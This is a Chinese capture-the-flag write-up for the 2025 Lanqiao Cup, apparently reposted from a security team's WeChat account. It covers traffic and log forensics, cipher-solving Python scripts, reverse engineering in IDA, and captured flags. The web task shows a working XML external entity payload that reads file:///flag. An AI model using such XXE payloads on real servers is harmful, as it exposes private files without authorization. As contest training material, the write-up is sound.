2025蓝桥杯WP(LRT)
flowzip:
根据题目下载流量包,用流量分析软件打开
再通过追踪流查找http,一一排查最后找到flag
flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}
ezEvtx:
根据题目下载工具和文件
再通过日志筛选出警告信息
找到flag{confidential.docx }
Enigma:
打开附件,发现是用 cerberchef做的一个密码学题目,打开 cyberchef运行
得到
Flag{HELLOCTFERTHISISAMESSAGEFORYOU}
黑客密室逃脱:
日志中找到密文
Exp:
def decrypt_message(encoded_data, secret_key):
def compute_shift(byte_val, key_char):
return byte_val - ord(key_char)
encrypted_data = bytes.fromhex(encoded_data)
decrypted = [
chr(compute_shift(encrypted_data[i], secret_key[i % len(secret_key)]))
for i in range(len(encrypted_data))
]
return ''.join(decrypted)
# 用你的数据解密
secret_key = 'secret_key4501'
encoded_data =
'd9d1c4d9e0d694d199dc6b96615eaaca98aa92a891ccc9a66c966697a09993a796d7c5d19bde6c9991ae'
print(decrypt_message(encoded_data, secret_key))
得到
ShadowPhases:
用 ida64打开后,在这里打个断点
在弹出来的窗口随便输入点什么东西
运行到这个地方
得到 flag:flag{0fa830e7-b699-4513-801-51f35b0f3293}
easy_AES
正常AES,解密即可
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from collections import defaultdict
from functools import reduce
from typing import List, Dict, Set, Tuple
# 常量定义
CIPHER = b'6xbfx9bxb1x93x14x82x9axa4xc2xafxd0Lxadxbb5x0e|>x8c|xf0^dl~Xxc7RxcaZxabx16xbe rxf6Plxe0x93xfc)x0ex93x8exd3xd6'
KEY1_HEX = "74aeb356c6eb74f364cd316497c0f714"
GIFT = 64698960125130294692475067384121553664
def split_to_nibbles(value: int, hex_str: str = None) -> List[int]:
"""将128位整数或32字符hex字符串拆分为32个半字节(4位)"""
if hex_str:
return [int(c, 16) for c in hex_str]
return [ (value >> (124 - i*4)) & 0xF for i in range(32) ]
def find_valid_keys() -> List[Tuple[str, str]]:
# 预处理数据
gift_nibbles = split_to_nibbles(GIFT)
key1_nibbles = split_to_nibbles(0, KEY1_HEX)
# 生成候选位置
possible_candidates = [
[x for x in range(16) if (x & m) == b]
for m, b in zip(key1_nibbles, gift_nibbles)
]
# 构建候选映射
position_map = defaultdict(list)
for idx, nibble in enumerate(key1_nibbles):
position_map[nibble].append(idx)
# 筛选有效候选
nibble_candidates = {
nibble: reduce(lambda a,b: a & b, (set(possible_candidates[i]) for i in positions))
for nibble, positions in position_map.items()
}
# 深度优先搜索
solutions = []
visited = set()
mapping = {}
def backtrack(items: List[Tuple[int, Set[int]]]) -> bool:
if not items:
key0_hex = "".join(f"{mapping[nibble]:x}" for nibble in key1_nibbles)
cipher = AES.new(bytes.fromhex(key0_hex), AES.MODE_CBC, bytes.fromhex(KEY1_HEX))
plaintext = unpad(cipher.decrypt(CIPHER), 16)
if plaintext.startswith(b"flag{"):
solutions.append((key0_hex, plaintext.decode()))
return True
return False
curr_nibble, candidates = items[0]
for candidate in candidates - visited:
mapping[curr_nibble] = candidate
visited.add(candidate)
if backtrack(items[1:]):
return True
visited.remove(candidate)
del mapping[curr_nibble]
return False
# 按候选数量排序以优化搜索
sorted_items = sorted(
[(n, set(c)) for n, c in nibble_candidates.items()],
key=lambda x: len(x[1])
)
if backtrack(sorted_items):
return solutions
return []
if __name__ == "__main__":
if solutions := find_valid_keys():
for key, flag in solutions:
print(f"Found Key: {key}")
print(f"Flag: {flag}")
flag值:flag{886769b5-2301-4c37-bb73-4480b4eab682}
星际XML解析器:
操作内容:
很正常的XML外部实体注入
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" > ]>
<root>
<foo>&xxe;</foo>
</root>
flag值:
flag{a25134dd-f8fe-4187-9e73-27703fe98115}
文案|李何欢
排版|刘朋峻校正|潘瑶
审核|林炳辰
原文始发于微信公众号(凌日网络与信息安全团队):2025蓝桥杯WP(LRT)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论